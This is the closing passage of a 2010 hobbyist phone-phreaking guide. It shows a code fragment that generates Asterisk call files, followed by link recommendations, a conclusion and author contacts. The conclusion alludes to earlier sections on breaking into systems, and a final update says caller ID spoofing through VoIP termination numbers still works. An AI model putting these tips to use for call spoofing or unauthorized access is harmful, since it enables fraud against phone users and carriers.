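    text = render_call_file("IAX2/username:password@provideraddress.com/15555551337",
                            "5555556798", "5555555148")
    with open(drop_call_file(text, spool, stage)) as fh:
        return fh.read()


if __name__ == "__main__":
    print(dry_run(), end="")
```

For a real call, replace the scratch directories in dry_run() with the SPOOL_DIR and STAGE_DIR defaults of drop_call_file() and run it as a user that can write to both; the file is picked up by Asterisk's spool thread as soon as the rename completes.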
Section 7: Suggested Links
---------------------------

Well I was planning on continuing this guide with a section on asterisk, but in retrospect there was just too much information out there to really add anything useful. So instead I will just include links on how to install and configure asterisk. You should consider trying it out. Setting up your own voicemail system, conference bridge, diverter, etc. are just a few of the things you can do with asterisk, so it's definitely a huge suggestion. I provided a link to download asterisk, but if you need help installing and setting up asterisk try the link below...

www.asteriskguru.com

This site includes installation guides and everything else you could need to help set up asterisk on your own LAN.

Now that I'm done with that I should suggest some links for basic information on telephony. As you might have noticed I didn't spare the acronyms in this guide, and didn't even bother explaining half the terminology I used. So if you found yourself confused reading this guide then I'd suggest the two following links..

www.tech-faq.com/telephone-wiring.shtml
http://pt.com/page/tutorials/ss7-tutorial

The first link will guide you through the inner workings of most of the protocols and terminology I went over briefly over the course of this guide, and the second link is a basic tutorial on CCSS7, which is the current signalling protocol the PSTN uses (until the FCC decides to convert it all). You will need to read through both in order to understand how the phone system operates, and if you're interested in truly exploring this system I'd suggest studying both.

Also as promised is a brief text on DATU lines in case they're present in your LEC...

http://www.nettwerked.net/datu.txt

Now finally are my brief suggestions on sites to follow..

www.informationleak.net - As always this is my first suggestion.
I'm not nearly as active on IL as I used to be, but Halla has been doing a great job of keeping the site alive and there is always an active community here that keeps all the information (including the phreaking bit) up-to-date. So keep track.

www.oldskoolphreak.com - This site isn't nearly as active as it used to be, but there are still some decent guides on it and it's updated every now and then. Still a somewhat decent reference for some information.

www.binrev.com - Besides IL I'd absolutely suggest this forum for up-to-date phreaking information. The community has a lot of sections, but the phreaking section is very active and is definitely worth a check.

Section 8: The Conclusion
--------------------------

Well this is by far the longest I've slacked on any tutorial I had in mind. I had been thinking about writing this update since at least 2008, but for one reason or another always delayed it. Some decent reasons, but mostly just laziness. As before I hope that I've grabbed your interest in phreaking, but I'd like you to keep in mind that there is much (and MUCH and MUCH) more to phreaking than breaking the law. All the sections I wrote on breaking into random systems were more or less just teasers, but I hope out of this and playing around with all of it you've snagged some sort of appreciation for telephony and will continue from here. If this guide grabbed your interest, by all means learn what you can. If this is really your first introduction to telephony there is a lot to be learned and I hope you find it as fascinating as I do.

I'm willing to help where I can, but I can't help everyone. I've included some contact information below if you need more help. I can't promise you any immediate help, but I'll help who I have time for.

Murder Mouse
fuck copyright, 2010

pla229 [skat] gmail [rot] com
www.informationleak.net
http://houseofhackers.ning.com/profile/MurderMouse
Yahoo! ID: murder_mouse
Skype ID: murder-mouse
IRC: irc.2600.net | #infoleak | nick: MurderM

(Update: Op diverting through Google Voice no longer works. It was fun while it lasted, but you can still ANI spoof through voip termination numbers)